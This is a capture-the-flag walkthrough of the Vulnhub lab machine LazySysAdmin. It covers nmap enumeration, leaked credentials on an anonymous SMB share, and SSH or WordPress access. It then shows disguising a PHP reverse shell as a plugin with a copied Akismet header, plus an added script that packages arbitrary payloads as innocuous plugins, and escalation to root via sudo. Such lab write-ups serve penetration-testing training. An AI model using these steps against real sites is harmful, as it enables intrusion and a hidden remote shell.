LazySysAdmin walkthrough notes
Overview
LazySysAdmin is a Vulnhub machine. It is fairly easy overall; the main skill it tests is noticing weak and reused credentials on the exposed services.
Machine download: https://pan.baidu.com/s/19nBjhMpGkdBDBFSnMEDfOg?pwd=heyj
Extraction code: heyj
1. nmap scan
1) Host discovery
# -sn: ping scan only, no port scan
sudo nmap -sn 192.168.247.1/24
The target's IP address is 192.168.247.138:
MAC Address: 00:50:56:FA:CB:D3 (VMware)
Nmap scan report for 192.168.247.138
Host is up (0.00072s latency).
2) Port scan
-sT: full TCP connect scan; --min-rate 10000: send no slower than 10000 packets per second; -p-: all 65535 ports; -o ports: write the result to the file ports (-o is the deprecated spelling of -oN, normal output; nmap still accepts it with a warning)
sudo nmap -sT --min-rate 10000 -p- 192.168.247.138 -o ports
Starting Nmap 7.93 ( https://nmap.org ) at 2024-08-08 10:21 EDT
Nmap scan report for 192.168.247.138
Host is up (0.0023s latency).
Not shown: 65529 closed tcp ports (conn-refused)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
139/tcp open netbios-ssn
445/tcp open microsoft-ds
3306/tcp open mysql
6667/tcp open irc
MAC Address: 00:0C:29:D5:2D:FE (VMware)
Nmap done: 1 IP address (1 host up) scanned in 1.81 seconds
Extracting the port list
cat prints the file, grep keeps the lines containing "open", awk -F '/' splits each line on "/" and prints the first field (the port number), paste -s joins all lines into one and -d sets the separator
cat ports | grep open | awk -F '/' '{print $1}' | paste -sd ','
Result: 22,80,139,445,3306,6667
Assign it to the shell variable ports
ports=$(cat ports | grep open | awk -F '/' '{print $1}' | paste -sd ',')
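The same extraction as a reusable shell function, added here as an example that is not part of the original post. It goes slightly beyond the one-liner: it keeps open|filtered rows (UDP scans report these), drops filtered and closed rows that merely contain the word "open" elsewhere, and de-duplicates and sorts the numbers. The sample file is constructed inline so the function can be tried offline; the file name is an assumption.

```sh
#!/bin/sh
# Added example, not from the original post: extract the open ports from an
# nmap normal-output file (-oN / -o) as the comma-separated list that -p expects.

nmap_open_ports() {
  # rows look like "80/tcp   open   http" or "161/udp  open|filtered snmp";
  # the summary line "Not shown: ... closed tcp ports" has no leading number
  grep -E '^[0-9]+/(tcp|udp) +open' "$1" \
    | awk -F/ '{ print $1 }' \
    | sort -un \
    | paste -s -d ',' -
}

# Constructed sample: a TCP scan and a UDP scan pasted into one file,
# with one duplicated row, so every branch of the function is exercised.
SAMPLE_FILE=$(mktemp)
cat > "$SAMPLE_FILE" <<'EOF'
Nmap scan report for 192.168.247.138
Host is up (0.0023s latency).
Not shown: 65528 closed tcp ports (conn-refused)
PORT     STATE         SERVICE
22/tcp   open          ssh
25/tcp   filtered      smtp
80/tcp   open          http
139/tcp  open          netbios-ssn
445/tcp  open          microsoft-ds
3306/tcp open          mysql
6667/tcp open          irc
161/udp  open|filtered snmp
80/tcp   open          http
EOF

# Usage on the page's own scan file would be:  ports=$(nmap_open_ports ports)
ports=$(nmap_open_ports "$SAMPLE_FILE")
echo "$ports"   # 22,80,139,161,445,3306,6667
```

Because the output is numeric-sorted and unique, the same function can be pointed at several scan files in turn and the results concatenated without producing duplicate -p entries.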
3) Detailed scan
TCP connect scan with version detection (-sV) and the default script set (-sC) against the ports in $ports, plus OS detection (-O), written to the file details
sudo nmap -sT -sV -sC -p$ports -O 192.168.247.138 -o details
# pressing Tab after typing $ports expands the variable, so the command the shell actually records is:
sudo nmap -sT -sV -sC -p22,80,139,445,3306,6667 -O 192.168.247.138 -o details
Result:
# Nmap 7.93 scan initiated Thu Aug 8 10:27:15 2024 as: nmap -sT -sV -sC -p22,80,139,445,3306,6667 -O -o details 192.168.247.138
Nmap scan report for 192.168.247.138
Host is up (0.00059s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 1024 b538660fa1eecd41693b82cfada1f713 (DSA)
| 2048 585a6369d0dadd51ccc16e00fd7e61d0 (RSA)
| 256 6130f3551a0ddec86a595bc99cb49204 (ECDSA)
|_ 256 1f65c0dd15e6e421f2c19ba3b655a045 (ED25519)
80/tcp open http Apache httpd 2.4.7 ((Ubuntu))
|_http-server-header: Apache/2.4.7 (Ubuntu)
|_http-generator: Silex v2.2.7
|_http-title: Backnode
| http-robots.txt: 4 disallowed entries
|_/old/ /test/ /TR2/ /Backnode_files/
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn Samba smbd 4.3.11-Ubuntu (workgroup: WORKGROUP)
3306/tcp open mysql MySQL (unauthorized)
6667/tcp open irc InspIRCd
| irc-info:
| server: Admin.local
| users: 1
| servers: 1
| chans: 0
| lusers: 1
| lservers: 0
| source ident: nmap
| source host: 192.168.247.128
|_ error: Closing link: (nmap@192.168.247.128) [Client exited]
MAC Address: 00:0C:29:D5:2D:FE (VMware)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
Service Info: Hosts: LAZYSYSADMIN, Admin.local; OS: Linux; CPE: cpe:/o:linux:linux_kernel
Host script results:
|_clock-skew: mean: -3h19m58s, deviation: 5h46m24s, median: 1s
| smb-os-discovery:
| OS: Windows 6.1 (Samba 4.3.11-Ubuntu)
| Computer name: lazysysadmin
| NetBIOS computer name: LAZYSYSADMIN\x00
| Domain name: \x00
| FQDN: lazysysadmin
|_ System time: 2024-08-09T00:27:30+10:00
|_nbstat: NetBIOS name: LAZYSYSADMIN, NetBIOS user: <unknown>, NetBIOS MAC: 000000000000 (Xerox)
| smb2-security-mode:
| 311:
|_ Message signing enabled but not required
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb2-time:
| date: 2024-08-08T14:27:30
|_ start_date: N/A
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Thu Aug 8 10:27:38 2024 -- 1 IP address (1 host up) scanned in 23.27 seconds
The target exposes SSH, HTTP (Apache with a WordPress-style generator tag and a robots.txt listing /old/, /test/, /TR2/ and /Backnode_files/), SMB (Samba 4.3.11), MySQL and IRC (InspIRCd). Note also the smb-security-mode result, account_used: guest: nmap was able to talk to Samba as a guest, which already hints that anonymous access to the shares is allowed.
4) Vulnerability script scan
nmap --script=vuln -p22,80,139,445,3306,6667 192.168.247.138 -o vuln
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
| http-slowloris-check:
| VULNERABLE:
| Slowloris DOS attack
| State: LIKELY VULNERABLE
| IDs: CVE:CVE-2007-6750
| Slowloris tries to keep many connections to the target web server open and hold
| them open as long as possible. It accomplishes this by opening connections to
| the target web server and sending a partial request. By doing so, it starves
| the http server's resources causing Denial Of Service.
|
| Disclosure date: 2009-09-17
| References:
| http://ha.ckers.org/slowloris/
|_ https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6750
|_http-dombased-xss: Couldn't find any DOM based XSS.
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
|_http-csrf: Couldn't find any CSRF vulnerabilities.
| http-enum:
| /wordpress/: Blog
| /test/: Test page
| /robots.txt: Robots file
| /info.php: Possible information file
| /phpmyadmin/: phpMyAdmin
| /wordpress/wp-login.php: Wordpress login page.
| /apache/: Potentially interesting directory w/ listing on 'apache/2.4.7 (ubuntu)'
|_ /old/: Potentially interesting directory w/ listing on 'apache/2.4.7 (ubuntu)'
139/tcp open netbios-ssn
445/tcp open microsoft-ds
3306/tcp open mysql
6667/tcp open irc
|_irc-unrealircd-backdoor: Server closed connection, possibly due to too many reconnects. Try again with argument irc-unrealircd-backdoor.wait set to 100 (or higher if you get this message again).
| irc-botnet-channels:
|_ ERROR: TIMEOUT
Host script results:
|_smb-vuln-ms10-054: false
| smb-vuln-regsvc-dos:
| VULNERABLE:
| Service regsvc in Microsoft Windows systems vulnerable to denial of service
| State: VULNERABLE
| The service regsvc in Microsoft Windows 2000 systems is vulnerable to denial of service caused by a null deference
| pointer. This script will crash the service if it is vulnerable. This vulnerability was discovered by Ron Bowes
| while working on smb-enum-sessions.
|_
|_smb-vuln-ms10-061: false
Nmap done: 1 IP address (1 host up) scanned in 320.62 seconds
Read this report critically before acting on it. http-slowloris-check says "LIKELY VULNERABLE" on the basis of a timing heuristic and only describes a denial-of-service condition, which does not help us get a shell; smb-vuln-regsvc-dos describes a Windows 2000 regsvc bug and is a false positive against Samba 4.3.11; irc-unrealircd-backdoor does not apply at all, because the server identified itself as InspIRCd. The genuinely useful part is the http-enum list: /wordpress/, /phpmyadmin/, /test/, /old/, /apache/, /info.php and /robots.txt. Prioritising by attack surface, we test the web service first, then SMB, MySQL and SSH.
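A vuln scan like the one above runs for minutes and prints mostly negative results; the lines that matter are the few carrying a State of VULNERABLE or LIKELY VULNERABLE. The following shell function, added here as an example that is not part of the original post, reduces an nmap --script vuln report to one line per such finding (port, script, state, IDs) so each can be checked for false positives as discussed above. The input is a constructed, trimmed copy of this page's report; the file name is an assumption.

```sh
#!/bin/sh
# Added example, not from the original post: triage nmap --script vuln output.
# Prints "<port> <script> <state> [<ids>]" for every script block whose State
# line is set; host-script results are keyed as "host".

nmap_vuln_findings() {
  awk '
    function flush() {
      if (state != "")
        printf "%s %s %s%s\n", port, script, state, (ids != "" ? " " ids : "")
      state = ""; ids = ""
    }
    /^[0-9]+\/(tcp|udp) /   { flush(); port = $1; next }
    /^Host script results:/ { flush(); port = "host"; next }
    # a script block opens with "| <script-name>:" on a line of its own
    /^\| [a-z0-9_-]+: *$/   { flush(); script = $2; sub(/:$/, "", script); next }
    /^\|[ _] *State: /      { s = $0; sub(/.*State: */, "", s); sub(/[ \t]+$/, "", s); state = s; next }
    /^\|[ _] *IDs: /        { s = $0; sub(/.*IDs: */, "", s);   sub(/[ \t]+$/, "", s); ids = s;   next }
    /^\|_/                  { flush() }   # "|_" is the last line of a block
    END                     { flush() }
  ' "$1"
}

# Constructed sample, trimmed from the report above.
VULN_SAMPLE=$(mktemp)
cat > "$VULN_SAMPLE" <<'EOF'
PORT     STATE SERVICE
22/tcp   open  ssh
80/tcp   open  http
| http-slowloris-check:
|   VULNERABLE:
|   Slowloris DOS attack
|     State: LIKELY VULNERABLE
|     IDs:  CVE:CVE-2007-6750
|     References:
|_      https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6750
|_http-dombased-xss: Couldn't find any DOM based XSS.
6667/tcp open  irc
|_irc-unrealircd-backdoor: Server closed connection, possibly due to too many reconnects.
Host script results:
|_smb-vuln-ms10-054: false
| smb-vuln-regsvc-dos:
|   VULNERABLE:
|   Service regsvc in Microsoft Windows systems vulnerable to denial of service
|     State: VULNERABLE
|_
|_smb-vuln-ms10-061: false
EOF

nmap_vuln_findings "$VULN_SAMPLE"
# 80/tcp http-slowloris-check LIKELY VULNERABLE CVE:CVE-2007-6750
# host smb-vuln-regsvc-dos VULNERABLE
```

Both lines the function returns for this sample are the ones dismissed above as not actionable, which is exactly the point of the triage step: the short list is what you verify by hand, the rest of the report can be skimmed.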
2. Web enumeration
The nmap vuln scan listed several paths; let's visit each of them.
http://192.168.247.138/
The home page; browsing through it turns up nothing useful.
http://192.168.247.138/wordpress/
The blog keeps repeating "My name is togie".
Could togie be a username? Keep it in mind and carry on.
http://192.168.247.138/test/
http://192.168.247.138/apache/
http://192.168.247.138/old/
http://192.168.247.138/info.php
http://192.168.247.138/robots.txt
None of these paths contains anything useful.
Next, the two login pages:
http://192.168.247.138/phpmyadmin/
http://192.168.247.138/wordpress/wp-login.php
Common weak passwords do not get us into either of them.
Try directory brute-forcing to see whether any pages were missed: gobuster, ffuf, dirb and dirsearch all do the job.
It is worth getting familiar with these commands; brute-forcing is a step a penetration test should always include, even though it turns up nothing of value this time.
Directory brute-forcing finds the same pages as before and nothing else of interest.
Web summary: one candidate username, togie.
3. SMB enumeration
(1) SSH credentials
smbclient -L 192.168.247.138
Sharename Type Comment
--------- ---- -------
print$ Disk Printer Drivers
share$ Disk Sumshare
IPC$ IPC IPC Service (Web server)
Reconnecting with SMB1 for workgroup listing.
Server Comment
--------- -------
Workgroup Master
--------- -------
WORKGROUP
We have no password, so try an empty one (press Enter at the prompt, or pass -N to skip it) and see whether the shares can be read anonymously; the earlier smb-security-mode result (account_used: guest) suggested this would work.
The share we care about most is share$, so connect to it:
smbclient //192.168.247.138/share$
Password for [WORKGROUP\kali]:
Try "help" to get a list of possible commands.
smb: \>
We are in; let's look around for useful information.
smb: \> dir
. D 0 Tue Aug 15 07:05:52 2017
.. D 0 Mon Aug 14 08:34:47 2017
wordpress D 0 Fri Aug 9 20:44:17 2024
Backnode_files D 0 Mon Aug 14 08:08:26 2017
wp D 0 Tue Aug 15 06:51:23 2017
deets.txt N 139 Mon Aug 14 08:20:05 2017
robots.txt N 92 Mon Aug 14 08:36:14 2017
todolist.txt N 79 Mon Aug 14 08:39:56 2017
apache D 0 Mon Aug 14 08:35:19 2017
index.html N 36072 Sun Aug 6 01:02:15 2017
info.php N 20 Tue Aug 15 06:55:19 2017
test D 0 Mon Aug 14 08:35:10 2017
old D 0 Mon Aug 14 08:35:13 2017
3029776 blocks of size 1024. 1313772 blocks available
Download the files with mget (answer y to each prompt):
smb: \> mget *.*
Get file deets.txt? y
getting file \deets.txt of size 139 as deets.txt (33.9 KiloBytes/sec) (average 33.9 KiloBytes/sec)
Get file robots.txt? y
getting file \robots.txt of size 92 as robots.txt (29.9 KiloBytes/sec) (average 32.2 KiloBytes/sec)
Get file todolist.txt? y
getting file \todolist.txt of size 79 as todolist.txt (25.7 KiloBytes/sec) (average 30.3 KiloBytes/sec)
Get file index.html? y
getting file \index.html of size 36072 as index.html (7045.2 KiloBytes/sec) (average 2368.6 KiloBytes/sec)
Get file info.php? y
getting file \info.php of size 20 as info.php (9.8 KiloBytes/sec) (average 2091.1 KiloBytes/sec)
Of these, only deets.txt contains anything we can use:
cat deets.txt
CBF Remembering all these passwords.
Remember to remove this file and update your password after we push out the server.
Password 12345
That gives us a password, 12345.
Could it be togie's password? It is worth trying against SSH; reused passwords are exactly what this machine is about.
(2) WordPress credentials
Next, look at the smb share's /wordpress directory:
smb: \wordpress\> ls
. D 0 Fri Aug 9 20:44:17 2024
.. D 0 Tue Aug 15 07:05:52 2017
wp-config-sample.php N 2853 Wed Dec 16 04:58:26 2015
wp-trackback.php N 4582 Fri Aug 9 10:33:20 2024
wp-admin D 0 Wed Aug 2 17:02:02 2017
wp-settings.php N 16200 Thu Apr 6 14:01:42 2017
wp-blog-header.php N 364 Sat Dec 19 06:20:28 2015
index.php N 418 Tue Sep 24 20:18:11 2013
wp-cron.php N 3286 Sun May 24 13:26:25 2015
wp-links-opml.php N 2422 Sun Nov 20 21:46:30 2016
readme.html N 7413 Fri Aug 9 10:33:21 2024
wp-signup.php N 29924 Tue Jan 24 06:08:42 2017
wp-content D 0 Fri Aug 9 10:56:13 2024
license.txt N 19935 Fri Aug 9 10:33:21 2024
wp-mail.php N 8002 Fri Aug 9 10:33:21 2024
wp-activate.php N 6864 Fri Aug 9 10:33:21 2024
.htaccess H 35 Tue Aug 15 07:40:13 2017
xmlrpc.php N 3065 Wed Aug 31 12:31:29 2016
wp-login.php N 34347 Fri Aug 9 10:33:21 2024
wp-load.php N 3301 Mon Oct 24 23:15:30 2016
wp-comments-post.php N 1627 Mon Aug 29 08:00:32 2016
wp-config.php N 3703 Mon Aug 21 05:25:14 2017
wp-includes D 0 Wed Aug 2 17:02:03 2017
3029776 blocks of size 1024. 1313868 blocks available
wp-config.php stands out (license.txt is just the stock WordPress licence text). wp-config.php defines the database connection constants DB_NAME, DB_USER and DB_PASSWORD in the clear, so it should never be readable over an anonymous share.
Download it and inspect it.
It contains a username and password for the WordPress database; save them in a creds file and try them on the WordPress login page as well.
4. Gaining a foothold
We now hold two sets of credentials.
Option 1: SSH credentials
ssh togie@192.168.247.138
(log in with the password 12345 from deets.txt)
Option 2: WordPress
Once logged into the admin panel, the first idea is to upload a plugin that spawns a reverse shell.
Grab any PHP reverse shell from the web; I used pentestmonkey's php-reverse-shell (set its $ip and $port to your listener before packaging it).
Copy the header block from any existing plugin and paste it at the top of the reverse-shell script. WordPress only needs the Plugin Name: line to accept a file as a plugin; the rest of the header is cosmetic:
/**
* @package Akismet
*/
/*
Plugin Name: Akismet Anti-Spam
Plugin URI: https://akismet.com/
Description: Used by millions, Akismet is quite possibly the best way in the world to <strong>protect your blog from spam</strong>. It keeps your site protected even while you sleep. To get started: activate the Akismet plugin and then go to your Akismet Settings page to set up your API key.
Version: 3.3.3
Author: Automattic
Author URI: https://automattic.com/wordpress-plugins/
License: GPLv2 or later
Text Domain: akismet
*/
Then pack it into a zip, since the uploader accepts only zip archives:
zip rev.zip php-reverse-shell.php
adding: php-reverse-shell.php (deflated 58%)
Upload and install it through the plugin uploader in the admin panel.
Success.
Start a local listener:
nc -lvp 4444
Then request the uploaded file directly. WordPress unpacks an archive with no top-level directory into a folder named after the zip, so rev.zip ends up under plugins/rev/:
http://192.168.247.138/wordpress/wp-content/plugins/rev/php-reverse-shell.php
The reverse shell connects back.
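The packaging steps above (plugin header, single-file zip, resulting path under plugins/<zip name>/) as an added shell example, not from the original post. It wraps any PHP payload in a minimal WordPress plugin header, checks that the result is something the uploader will accept, and zips it. The stand-in payload, plugin name and file names are assumptions, and zip is only invoked if it is installed.

```sh
#!/bin/sh
# Added example, not from the original post. Wraps a PHP payload in the header
# WordPress needs to accept a file as a plugin (only "Plugin Name:" is
# mandatory) and packages it the way the uploader expects: a zip with the .php
# at the archive root, which WordPress installs as plugins/<zip basename>/.
# Payload, plugin name and output paths below are assumptions.

# make_wp_plugin PAYLOAD_PHP OUT_PHP "Plugin Name"
# Writes OUT_PHP = plugin header + payload. If the payload's first line is its
# own "<?php", that tag is dropped so the result contains exactly one open tag.
make_wp_plugin() {
  {
    printf '<?php\n/*\nPlugin Name: %s\nDescription: Site maintenance helper\nVersion: 1.0\nAuthor: admin\n*/\n' "$3"
    awk 'NR == 1 && $0 ~ /^<[?]php/ { sub(/^<[?]php[ \t]*/, ""); if ($0 == "") next } { print }' "$1"
  } > "$2"
}

# wp_plugin_header_ok FILE: succeeds when FILE opens with <?php and carries a
# Plugin Name header, i.e. the plugin uploader will accept it.
wp_plugin_header_ok() {
  [ "$(head -n 1 "$1")" = "<?php" ] && grep -q '^Plugin Name: ' "$1"
}

# package_wp_plugin PHP_FILE OUT_ZIP: -j stores the file without its directory
# so the archive root holds the .php directly.
package_wp_plugin() {
  if ! command -v zip >/dev/null 2>&1; then
    echo "zip not installed; cannot build $2" >&2
    return 1
  fi
  zip -qj "$2" "$1"
}

# Demo with a constructed, harmless payload; in practice the payload is
# php-reverse-shell.php with $ip/$port pointed at your listener.
WORK=$(mktemp -d)
printf '<?php\necho "plugin loaded";\n' > "$WORK/payload.php"
make_wp_plugin "$WORK/payload.php" "$WORK/rev.php" "Site Helper"
wp_plugin_header_ok "$WORK/rev.php" && echo "plugin file ready: $WORK/rev.php"
package_wp_plugin "$WORK/rev.php" "$WORK/rev.zip" && echo "upload $WORK/rev.zip, then request wp-content/plugins/rev/rev.php"
```

Keeping the payload's original open tag out of the merged file matters: a second `<?php` after the header comment is a parse error in PHP, and a plugin that fails to parse is rejected at activation, before the payload ever runs.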
python -c "import pty;pty.spawn('/bin/bash')"
www-data@LazySysAdmin:/$ uname -a
uname -a
Linux LazySysAdmin 4.4.0-31-generic #50~14.04.1-Ubuntu SMP Wed Jul 13 01:06:37 UTC 2016 i686 i686 i686 GNU/Linux
export TERM=xterm-color # so that clear works in the upgraded shell
Looking for the flag: there is a togie user, but the home directory is empty. Switch to that user with the password from deets.txt:
www-data@LazySysAdmin:/home/togie$ su togie
su togie
Password: 12345
togie@LazySysAdmin:~$
5. Escalating to root
sudo -l # check what togie may run with sudo
togie's sudo entry is (ALL : ALL) ALL, i.e. any command as any user, authenticated with his own password.
So a plain sudo /bin/bash gives a root shell.
Grab the flag:
root@LazySysAdmin:/root# cat proof.txt
cat proof.txt
WX6k7NJtA8gfk*w5J3&T@*Ga6!0o5UP89hMVEQ#PT9851
Well done :)
Hope you learn't a few things along the way.
Regards,
Togie Mcdogie
Enjoy some random strings
WX6k7NJtA8gfk*w5J3&T@*Ga6!0o5UP89hMVEQ#PT9851
2d2v#X6x9%D6!DDf4xC1ds6YdOEjug3otDmc1$#slTET7
pf%&1nRpaj^68ZeV2St9GkdoDkj48Fl$MI97Zt2nebt02
bhO!5Je65B6Z0bhZhQ3W64wL65wonnQ$@yw%Zhy0U19pu
Summary
- An nmap scan showed ports 22, 80, 139, 445, 3306 and 6667 open; by priority we started with the web service.
- The vuln script scan revealed several web paths; visiting them one by one gave us a candidate username, togie, plus the WordPress and phpMyAdmin login pages.
- The anonymously readable SMB share leaked togie's password (deets.txt) and the WordPress username and password (wp-config.php).
- A foothold was obtained either over SSH or through a WordPress plugin reverse shell.
- sudo /bin/bash escalated to root, and the flag was read from proof.txt.